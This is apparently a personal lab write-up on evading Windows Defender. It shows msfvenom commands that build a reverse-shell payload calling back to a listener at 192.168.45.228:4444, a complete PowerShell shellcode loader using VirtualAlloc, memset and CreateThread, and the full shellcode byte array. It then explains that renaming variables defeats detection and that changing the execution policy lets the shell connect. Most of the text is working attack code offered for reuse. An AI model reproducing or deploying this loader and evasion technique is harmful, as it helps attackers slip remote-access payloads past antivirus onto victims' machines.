Antivirus Evasion



List a file's SHA-256 hash:

└─$ sha256sum post.txt   



Dump a file in binary and ASCII form with xxd:

└─$ xxd -b post.txt                          




Use msfvenom to package a reverse shell payload as an exe, named binary.exe:

└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.228 LPORT=4444 -f exe > binary.exe




Copying the file onto a Windows system with Defender installed immediately raises an alert like the following






It is classified as a Trojan backdoor and quarantined outright, so it cannot be used.




Uploading it to VirusTotal also flags it as a Trojan backdoor.




Next, hand-write a PowerShell (PS) script as follows:

===================================================================
# P/Invoke signatures, compiled into an in-memory .NET type by Add-Type below
$code = '
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';

$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;

[Byte[]];
[Byte[]]$sc = <place your shellcode here>;

# allocate at least one page, or the payload length if it is larger
$size = 0x1000;
if ($sc.Length -gt 0x1000) {$size = $sc.Length};

# 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE
$x = $winFunc::VirtualAlloc(0,$size,0x3000,0x40);

# copy the payload one byte at a time into the allocated buffer
for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};

# start the buffer in a new thread, then keep the process alive
$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };
===================================================================




The script first imports VirtualAlloc and CreateThread from kernel32.dll, then imports memset from msvcrt.dll. These functions allow it to allocate memory, create an execution thread, and write arbitrary data into the allocated memory. The memory is allocated and the new thread is created in the current process (powershell.exe), not in a remote process.

=====================================================================
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';
======================================================================




The script's main logic first uses VirtualAlloc to allocate a block of memory, then takes each byte of the payload stored in the $sc byte array and writes it into the newly allocated block with memset.

=======================================================================
[Byte[]]$sc = <place your shellcode here>;

$size = 0x1000;
if ($sc.Length -gt 0x1000) {$size = $sc.Length};

$x = $winFunc::VirtualAlloc(0,$size,0x3000,0x40);

for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};
========================================================================




In the last line, the payload that was written into memory is executed in a separate thread via the CreateThread API.

=================================================
$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };
=================================================



Next, generate the payload that goes into the PowerShell script. Here msfvenom outputs it directly in PowerShell format, into a variable named sc:

└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.228 LPORT=4444 -f powershell -v sc

Reference page for generating msfvenom payloads: https://www.pa55w0rd.online/msfvenom%20_use/




Paste the sc output into the $sc variable of the original PowerShell script:

=======================================================================

[Byte[]] $sc = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52,0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1,0x51,0x8b,0x59,0x20,0x1,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac,0xc1,0xcf,0xd,0x1,0xc7,0x38,0xe0,0x75,0xf6,0x3,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c,0x1,0xd3,0x8b,0x4,0x8b,0x1,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x0,0x0,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x7,0xff,0xd5,0xb8,0x90,0x1,0x0,0x0,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x0,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x5,0x68,0xc0,0xa8,0x2d,0xe4,0x68,0x2,0x0,0x11,0x5c,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0xc,0xff,0x4e,0x8,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x68,0x63,0x6d,0x64,0x0,0x89,0xe3,0x57,0x57,0x57,0x31,0xf6,0x6a,0x12,0x59,0x56,0xe2,0xfd,0x66,0xc7,0x44,0x24,0x3c,0x1,0x1,0x8d,0x44,0x24,0x10,0xc6,0x0,0x44,0x54,0x50,0x56,0x56,0x56,0x46,0x56,0x4e,0x56,0x56,0x53,0x56,0x68,0x79,0xcc,0x3f,0x86,0xff,0xd5,0x89,0xe0,0x4e,0x56,0x46,0xff,0x30,0x68,0x8,0x87,0x1d,0x60,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x6,0x7c,0xa,0x80,0xfb,0xe0,0x75,0x5,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x0,0x53,0xff,0xd5

======================================================================= 


Save the result as a standard PS1 script. When executed, the antivirus wipes it out straight away.





Make a few name changes: $winFunc --> $var2

$sc --> $var1

and the type name Win32 --> iWin32




Now the antivirus no longer detects it at all.




When testing the PS1 to get a reverse shell, it turned out that it would not run.




Check the current user's policy with Get-ExecutionPolicy -Scope CurrentUser

It is Undefined, i.e. not set, which is why the script cannot run.




Run Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser

to lift the restriction, apply it to All Users, and running Get-ExecutionPolicy again shows it is now unrestricted.




Run it once more and the reverse shell comes in.





